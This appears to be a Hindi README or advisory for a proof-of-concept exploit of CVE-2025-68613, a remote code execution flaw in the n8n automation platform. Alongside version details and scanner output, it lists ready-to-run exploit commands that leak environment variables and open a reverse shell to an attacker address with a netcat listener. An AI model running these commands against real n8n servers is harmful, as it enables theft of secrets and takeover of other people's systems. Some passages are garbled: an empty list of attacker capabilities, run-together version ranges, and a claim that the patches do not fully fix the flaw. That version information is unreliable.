
CVE-2025-68613

गंभीरता: 🔴 क्रिटिकल प्रभाव: रिमोट कोड एक्ज़ीक्यूशन प्रभावित प्लेटफ़ॉर्म: n8n (वर्कफ़्लो ऑटोमेशन)
CVE-2025-68613, n8n में एक क्रिटिकल सुरक्षा कमज़ोरी है, जो एक ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है। यह समस्या एक प्रमाणित हमलावर को वर्कफ़्लो एक्सप्रेशन के मूल्यांकन का दुरुपयोग करके सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।
💥 यह खतरनाक क्यों है: दुर्भावनापूर्ण एक्सप्रेशन का मूल्यांकन एक ऐसे संदर्भ में किया जाता है जो ठीक से सैंडबॉक्स नहीं किया गया है, जिससे अंतर्निहित रनटाइम तक पहुंच मिलती है।

यदि शोषण किया जाता है, तो एक हमलावर यह कर सकता है:
हमला n8n सेवा के समान विशेषाधिकारों के साथ चलता है, जिससे इसका प्रभाव बढ़ जाता है।
| मीट्रिक | मान |
|---|---|
| CVSS v3.1 | ~9.9–10.0 |
| गोपनीयता | उच्च |
| अखंडता | उच्च |
| उपलब्धता | उच्च |
➡️ प्रमाणीकरण आवश्यक है, लेकिन कोई व्यवस्थापक पहुंच की आवश्यकता नहीं है।
🚫 कमज़ोर:
0.211.0 → 1.120.31.121.0✅ पैच किए गए:
1.120.41.121.11.122.0 और नए(कमज़ोरी को पूरी तरह से नहीं हटाता)
CVE-2025-68613.py — रिमोट संस्करण और एक्सपोज़र जाँचकर्ता (सुरक्षित)sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
या यदि आप होस्ट की सूची को स्कैन करना चाहते हैं, तो निष्पादित करें:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
उदाहरण आउटपुट
उपयोग उदाहरण:
पर्यावरण चर लीक करें:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak
उपयोगकर्ता जानकारी प्राप्त करें:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id
रिवर्स शेल (पहले लिसनर शुरू करें: nc -lvnp 4444):
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444
यह स्क्रिप्ट केवल अधिकृत सुरक्षा परीक्षण के लिए है, उन सिस्टमों पर जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है।
🔒 यह स्क्रिप्ट n8n में CVE-2025-68613 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है।
📚 यह केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान की जाती है।
🛡️ इसका उपयोग विशेष रूप से उन सिस्टमों पर करें जिनके आप मालिक हैं, नियंत्रित करते हैं, या जिनके परीक्षण की स्पष्ट लिखित अनुमति है।
🚫 किसी भी सिस्टम के खिलाफ अनधिकृत उपयोग गैरकानूनी है और कानूनों का उल्लंघन हो सकता है (जैसे, कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम)।
❌ लेखक और कोई भी संबद्ध पक्ष दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई देयता नहीं मानते हैं।
✅ जिम्मेदारी से, नैतिक रूप से, और सभी लागू कानूनों और विनियमों के पूर्ण अनुपालन में उपयोग करें।
🔐 यदि पेनिट्रेशन टेस्टिंग कर रहे हैं, तो सुनिश्चित करें कि उचित प्राधिकरण (जैसे, एंगेजमेंट के नियम) मौजूद हैं।
🛠️ सुरक्षा शोधकर्ता इसका उपयोग कमज़ोरियों को सत्यापित करने और समय पर पैचिंग को प्रोत्साहित करने के लिए कर सकते हैं।
| श्रेणी | जानकारी |
|---|
| CVE ID | CVE-2025-68613 |
| उत्पाद | n8n |
| बग वर्ग | एक्सप्रेशन इंजेक्शन |
| परिणाम | रिमोट कोड एक्ज़ीक्यूशन |
| आवश्यक पहुंच | प्रमाणित उपयोगकर्ता |
| फिक्स उपलब्ध | हाँ |